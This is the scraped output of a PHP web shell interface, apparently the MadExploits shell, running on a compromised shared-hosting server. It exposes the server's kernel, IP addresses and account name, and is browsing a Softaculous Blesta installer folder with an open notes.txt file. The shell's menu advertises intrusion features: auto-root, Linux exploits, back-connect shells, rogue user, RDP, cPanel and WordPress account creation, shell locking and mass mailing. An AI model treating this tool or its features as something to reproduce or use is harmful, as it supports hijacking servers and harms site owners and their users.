Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 3.146.206.246
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
blesta /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
_blesta.php
12.78
KB
-rw-r--r--
blesta.zip
55.73
MB
-rw-r--r--
data.zip
802
B
-rw-r--r--
fileindex.php
129
B
-rw-r--r--
import.php
16.72
KB
-rw-r--r--
info.xml
6.76
KB
-rw-r--r--
install.js
924
B
-rw-r--r--
install.php
9.99
KB
-rw-r--r--
install.xml
1011
B
-rw-r--r--
ioncube.php
246
B
-rw-r--r--
md5
890
B
-rw-r--r--
notes.txt
1.12
KB
-rw-r--r--
upgrade.php
7.96
KB
-rw-r--r--
upgrade.xml
245
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : notes.txt
1. We add "admin_login::setup" in the below line in _blesta.php in our package. Configure::set("Blesta.csrf_bypass", array("admin_login::setup")); 2. We have purposely kept one blank line in "blesta_install.input" and in "blesta_install2.input" files because since version 4.8.0 'port' => '{database_port}' has become compulsory input parameter for install and this value may vary from server to server hence we have kept it blank. 3. Blesta releases Patch for different PHP versions to support ioncube encoding. Kindly check and update in every version. if(sversion_compare(sphpversion(), '7.0', '>=')){ if(file_exists($software['path'].'/patch/php7hotfix.zip')){ if(!sunzip($software['path'].'/patch/php7hotfix.zip', $__settings['softpath'].'/app/')){ $error[] = 'Could not unzip the php7hotfix.zip'; } } } *Please note that, Since Blesta 4.6.0 the above patches are needed only if Ioncube version is less than 10.1.0.(We have handled this in install.php) 4. PHP REQUIREMENT LINK: https://docs.blesta.com/display/user/Requirements 5. Json extension requirement added because blesta installer needs json_decode function.
Close